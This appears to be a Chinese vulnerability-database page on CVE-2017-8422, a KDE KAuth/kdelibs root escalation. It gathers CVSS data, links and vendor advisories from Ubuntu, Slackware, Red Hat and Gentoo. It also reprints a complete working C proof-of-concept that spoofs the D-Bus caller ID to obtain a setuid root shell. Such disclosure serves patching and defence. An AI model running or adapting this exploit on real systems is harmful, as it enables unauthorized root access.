CVE-2017-8422
CVSS7.2
发布时间 :2017-05-17 10:29:00
修订时间 :2018-01-04 21:31:53
NMPS    

[原文]KDE kdelibs before 4.14.32 and KAuth before 5.34 allow local users to gain root privileges by spoofing a callerID and leveraging a privileged helper app.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

cpe:/a:kde:kauth:5.33
cpe:/a:kde:kdelibs:4.14.31

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8422
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8422
(官方数据源) NVD

- 其它链接及资源

http://www.debian.org/security/2017/dsa-3849
(UNKNOWN)  DEBIAN  DSA-3849
http://www.openwall.com/lists/oss-security/2017/05/10/3
(VENDOR_ADVISORY)  MLIST  [oss-security] 20170510 generic kde LPE
http://www.securityfocus.com/bid/98412
(VENDOR_ADVISORY)  BID  98412
http://www.securitytracker.com/id/1038480
(UNKNOWN)  SECTRACK  1038480
https://access.redhat.com/errata/RHSA-2017:1264
(UNKNOWN)  REDHAT  RHSA-2017:1264
https://bugzilla.redhat.com/show_bug.cgi?id=1449647
(PATCH)  CONFIRM  https://bugzilla.redhat.com/show_bug.cgi?id=1449647
https://cgit.kde.org/kauth.git/commit/?id=df875f725293af53399f5146362eb158b4f9216a
(PATCH)  CONFIRM  https://cgit.kde.org/kauth.git/commit/?id=df875f725293af53399f5146362eb158b4f9216a
https://cgit.kde.org/kdelibs.git/commit/?id=264e97625abe2e0334f97de17f6ffb52582888ab
(PATCH)  CONFIRM  https://cgit.kde.org/kdelibs.git/commit/?id=264e97625abe2e0334f97de17f6ffb52582888ab
https://security.gentoo.org/glsa/201706-29
(UNKNOWN)  GENTOO  GLSA-201706-29
https://www.exploit-db.com/exploits/42053/
(UNKNOWN)  EXPLOIT-DB  42053
https://www.kde.org/info/security/advisory-20170510-1.txt
(VENDOR_ADVISORY)  CONFIRM  https://www.kde.org/info/security/advisory-20170510-1.txt

- 漏洞信息 (F142496)

Ubuntu Security Notice USN-3286-1 (PacketStormID:F142496)
2017-05-15 00:00:00
Ubuntu  security.ubuntu.com
advisory,local,root
linux,ubuntu
CVE-2017-8422
[点击下载]

Ubuntu Security Notice 3286-1 - Sebastian Krahmer discovered that the KDE-Libs Kauth component incorrectly checked services invoking D-Bus. A local attacker could use this issue to gain root privileges.

===========================================================================
Ubuntu Security Notice USN-3286-1
May 15, 2017

kde4libs vulnerability
===========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 LTS

Summary:

KDE-Libs could be made to run programs as an administrator if it received
specially crafted input.

Software Description:
- kde4libs: KDE 4 core applications and libraries

Details:

Sebastian Krahmer discovered that the KDE-Libs Kauth component incorrectly
checked services invoking D-Bus. A local attacker could use this issue to
gain root privileges.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 14.04 LTS:
  kdelibs5-plugins                4:4.13.3-0ubuntu0.5

After a standard system update you need to reboot your computer to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3286-1
  CVE-2017-8422

Package Information:
  https://launchpad.net/ubuntu/+source/kde4libs/4:4.13.3-0ubuntu0.5



    

- 漏洞信息 (F142554)

Slackware Security Advisory - kdelibs Updates (PacketStormID:F142554)
2017-05-17 00:00:00
Slackware Security Team  slackware.com
advisory
linux,slackware
CVE-2017-8422
[点击下载]

Slackware Security Advisory - New kdelibs packages are available for Slackware 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  kdelibs (SSA:2017-136-02)

New kdelibs packages are available for Slackware 13.37, 14.0, 14.1, 14.2,
and -current to fix a security issue.


Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/kdelibs-4.14.32-i586-1_slack14.2.txz:  Upgraded.
  This update fixes a security issue with KAuth that can lead to gaining
  root from an unprivileged account.
  For more information, see:
    http://www.openwall.com/lists/oss-security/2017/05/10/3
    https://www.kde.org/info/security/advisory-20170510-1.txt
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8422
  (* Security fix *)
+--------------------------+


Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/kdelibs-4.5.5-i486-3_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/kdelibs-4.5.5-x86_64-3_slack13.37.txz

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/kdelibs-4.8.5-i486-2_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/kdelibs-4.8.5-x86_64-2_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/kdelibs-4.10.5-i486-3_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/kdelibs-4.10.5-x86_64-3_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/kdelibs-4.14.32-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/kdelibs-4.14.32-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/kde/kdelibs-4.14.32-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/kde/kdelibs-4.14.32-x86_64-1.txz


MD5 signatures:
+-------------+

Slackware 13.37 package:
2074c2dff09a4a74e60f48f08e0e9abc  kdelibs-4.5.5-i486-3_slack13.37.txz

Slackware x86_64 13.37 package:
692beba6610b1f2440650497bc3085cb  kdelibs-4.5.5-x86_64-3_slack13.37.txz

Slackware 14.0 package:
c61bd3215be43dac0544b54342548837  kdelibs-4.8.5-i486-2_slack14.0.txz

Slackware x86_64 14.0 package:
a408af269fbba64dde31a91b91c72650  kdelibs-4.8.5-x86_64-2_slack14.0.txz

Slackware 14.1 package:
5ddb537f570c63c792511a095bbadb86  kdelibs-4.10.5-i486-3_slack14.1.txz

Slackware x86_64 14.1 package:
199c36c994a11bd48748ef3988ee143b  kdelibs-4.10.5-x86_64-3_slack14.1.txz

Slackware 14.2 package:
ef1e87085864e36b70d9aadcdd20fa7a  kdelibs-4.14.32-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
5182a2121695c705376366f4be56861f  kdelibs-4.14.32-x86_64-1_slack14.2.txz

Slackware -current package:
ba5ba522f02e69ee6f44fc686cce081f  kde/kdelibs-4.14.32-i586-1.txz

Slackware x86_64 -current package:
da0befacb4014eafa221fbc694542d97  kde/kdelibs-4.14.32-x86_64-1.txz


Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg kdelibs-4.14.32-i586-1_slack14.2.txz


+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAlkbXZUACgkQakRjwEAQIjN5NACfR/uqzPV10Yyw2ilFMa07E+5i
ANMAn2ukOVo1nr+HZNifGrzpwK2BeLe4
=rmX2
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F142609)

Red Hat Security Advisory 2017-1264-01 (PacketStormID:F142609)
2017-05-22 00:00:00
Red Hat  
advisory,local,root,spoof
linux,redhat
CVE-2017-8422
[点击下载]

Red Hat Security Advisory 2017-1264-01 - The K Desktop Environment is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment. Security Fix: A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: kdelibs security update
Advisory ID:       RHSA-2017:1264-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2017:1264
Issue date:        2017-05-22
CVE Names:         CVE-2017-8422 
=====================================================================

1. Summary:

An update for kdelibs is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64le, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch

3. Description:

The K Desktop Environment (KDE) is a graphical desktop environment for the
X Window System. The kdelibs packages include core libraries for the K
Desktop Environment.

Security Fix(es):

* A privilege escalation flaw was found in the way kdelibs handled D-Bus
messages. A local user could potentially use this flaw to gain root
privileges by spoofing a callerID and leveraging a privileged helper
application. (CVE-2017-8422)

Red Hat would like to thank Sebastian Krahmer (SUSE) for reporting this
issue.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The desktop must be restarted (log out, then log back in) for this update
to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1449647 - CVE-2017-8422 kauth: service invoking dbus is not properly checked and allows local privilege escalation

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

x86_64:
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

x86_64:
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

aarch64:
kdelibs-4.14.8-6.el7_3.aarch64.rpm
kdelibs-common-4.14.8-6.el7_3.aarch64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.aarch64.rpm
kdelibs-devel-4.14.8-6.el7_3.aarch64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.aarch64.rpm

ppc64le:
kdelibs-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-common-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-devel-4.14.8-6.el7_3.ppc64le.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.ppc64le.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

ppc64:
kdelibs-4.14.8-6.el7_3.ppc.rpm
kdelibs-4.14.8-6.el7_3.ppc64.rpm
kdelibs-common-4.14.8-6.el7_3.ppc64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.ppc.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.ppc64.rpm
kdelibs-devel-4.14.8-6.el7_3.ppc.rpm
kdelibs-devel-4.14.8-6.el7_3.ppc64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.ppc.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.ppc64.rpm

s390x:
kdelibs-4.14.8-6.el7_3.s390.rpm
kdelibs-4.14.8-6.el7_3.s390x.rpm
kdelibs-common-4.14.8-6.el7_3.s390x.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.s390.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.s390x.rpm
kdelibs-devel-4.14.8-6.el7_3.s390.rpm
kdelibs-devel-4.14.8-6.el7_3.s390x.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.s390.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.s390x.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
kdelibs-4.14.8-6.el7_3.src.rpm

x86_64:
kdelibs-4.14.8-6.el7_3.i686.rpm
kdelibs-4.14.8-6.el7_3.x86_64.rpm
kdelibs-common-4.14.8-6.el7_3.x86_64.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.i686.rpm
kdelibs-debuginfo-4.14.8-6.el7_3.x86_64.rpm
kdelibs-devel-4.14.8-6.el7_3.i686.rpm
kdelibs-devel-4.14.8-6.el7_3.x86_64.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.i686.rpm
kdelibs-ktexteditor-4.14.8-6.el7_3.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:
kdelibs-apidocs-4.14.8-6.el7_3.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-8422
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFZIryyXlSAg2UNWIIRAut+AKCL6Q41BgxjibClfIq2Qwsu4M9CzQCfSd+5
f9o61xNcufb5ePgoksmuU6o=
=4XX+
-----END PGP SIGNATURE-----


--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
    

- 漏洞信息 (F142638)

KDE 4/5 KAuth Privilege Escalation (PacketStormID:F142638)
2017-05-23 00:00:00
stealth  
exploit
CVE-2017-8422,CVE-2017-8849
[点击下载]

KDE versions 4 and 5 suffer from a KAuth privilege escalation vulnerability.

// cc -Wall smb0k.c -pedantic -std=c11
//
// smb4k PoC, also demonstrating broader scope of a generic kde
// authentication bypass vulnerability
//
// (C) 2017 Sebastian Krahmer
//
 
#define _POSIX_C_SOURCE 200112L
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
 
 
void die(const char *s)
{
    perror(s);
    exit(errno);
}
 
 
int main(int argc, char **argv)
{
    char me[1024] = {0};
    char *dbus[] = {
        "/usr/bin/dbus-send",
        "--system",
        "--print-reply",
        "--dest=net.sourceforge.smb4k.mounthelper",
        "/",
        "org.kde.auth.performActions",
        "array:byte:"
// The variant map, containing evil mh_command key-pair
"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,"
"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,"
"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,"
"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,"
"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,"
"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,"
"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,"
"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,"
"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,"
"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,"
"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,"
"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,"
"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,"
"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,"
"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,"
"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,"
"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,"
"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,"
"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,"
"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,"
"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,"
"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,"
"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,"
"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,"
"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,"
"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,"
"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,"
"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,"
"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,"
"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,"
"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,"
"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,"
"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,"
"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,"
"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,"
"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,"
"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,"
"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,"
"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,"
"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,"
"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,"
"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,"
"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,"
"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,"
"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,"
"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,"
"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,"
"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,"
"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,"
"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,"
"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,"
"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,"
"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,"
"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,"
"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,"
"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,"
"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73",
 
// the callerID, ":1.0" which is dbus itself and thus always passes
"array:byte:58,49,46,48", NULL};
 
    char *boomsh = "/tmp/xmount.cifs";
    char *const sh[] = {me, "shell", NULL};
    char *const bash[] = {"/bin/bash", "--norc", "--noprofile", NULL};
    struct stat st;
    int fd = -1;
 
    if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
        die("[-] readlink");
 
    if (geteuid() == 0) {
        setuid(0);
        setgid(0);
        if (argc == 2) {
            execve(*bash, bash, NULL);
            die("[-] execve of bash");
        }
        chown(me, 0, 0);
        chmod(me, 04755);
        exit(0);
    }
 
    printf("[*] Creating shellscript ...\n");
    unlink(boomsh);
    if ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0)
        die("[-] open");
    write(fd, "#!/bin/sh\n", 10);
    write(fd, me, strlen(me));
    write(fd, "\n", 1);
    close(fd);
 
    printf("[*] Triggering call...\n");
 
    if (fork() == 0) {
        execve(*dbus, dbus, NULL);
        exit(1);
    }
    wait(NULL);
    sleep(5);
    printf("[*] Trying to find rootshell...\n");
 
    memset(&st, 0, sizeof(st));
    stat(me, &st);
    if ((st.st_mode & 04000) != 04000)
        die("[-] Failed to chmod ourselfs.\n");
 
    execve(me, sh, NULL);
    return 0;
}


    

- 漏洞信息 (F143154)

Gentoo Linux Security Advisory 201706-29 (PacketStormID:F143154)
2017-06-27 00:00:00
Gentoo  security.gentoo.org
advisory,local,root
linux,gentoo
CVE-2017-8422
[点击下载]

Gentoo Linux Security Advisory 201706-29 - A vulnerability in KAuth and KDELibs allows local users to gain root privileges. Versions less than 5.29.0-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201706-29
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: KAuth and KDELibs: Privilege escalation
     Date: June 27, 2017
     Bugs: #618108
       ID: 201706-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in KAuth and KDELibs allows local users to gain root
privileges.

Background
==========

KAuth provides a convenient, system-integrated way to offload actions
that need to be performed as a privileged user (root, for example) to
small (hopefully secure) helper utilities.

The KDE libraries, basis of KDE and used by many open source projects.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  kde-frameworks/kauth       < 5.29.0-r1              >= 5.29.0-r1
  2  kde-frameworks/kdelibs      < 4.14.32                 >= 4.14.32
    -------------------------------------------------------------------
     2 affected packages

Description
===========

KAuth and KDELibs contains a logic flaw in which the service invoking
D-Bus is not properly checked. This allows spoofing the identity of the
caller and with some carefully crafted calls can lead to gaining root
from an unprivileged account.

Impact
======

A local attacker could spoof the identity of the caller invoking D-Bus,
possibly resulting in gaining privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All KAuth users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=kde-frameworks/kauth-5.29.0-r1"=


All KDELibs users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=kde-frameworks/kdelibs-4.14.32"=


References
==========

[ 1 ] CVE-2017-8422
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-8422

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201706-29

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


--voP1sO4JWVQTvFRqAK0gNlgin5VF2eJFd--

    

- 漏洞信息

KDE KAuth CVE-2017-8422 Local Privilege Escalation Vulnerability
Unknown 98412
No Yes
2017-05-10 12:00:00 2017-05-19 02:34:00
Sebastian Krahmer

- 受影响的程序版本

Ubuntu Ubuntu Linux 14.04 LTS
SuSE Package Hub for SUSE Linux Enterprise 12
openSUSE Leap 42.2
openSUSE Leap 42.1
KDE kdelibs 4.14.30
KDE kdelibs 4.14
KDE kdelibs 4.13.3
KDE kdelibs 4.13.2
KDE kdelibs 4.13.1
KDE kdelibs 4.13
KDE kdelibs 4.12
KDE kdelibs 4.11.5
KDE kdelibs 4.11.4
KDE kdelibs 4.11.3
KDE kdelibs 4.11.2
KDE kdelibs 4.11.1
KDE kdelibs 4.11
KDE kdelibs 4.10.95
KDE kdelibs 4.10.3
KDE kdelibs 4.10.1
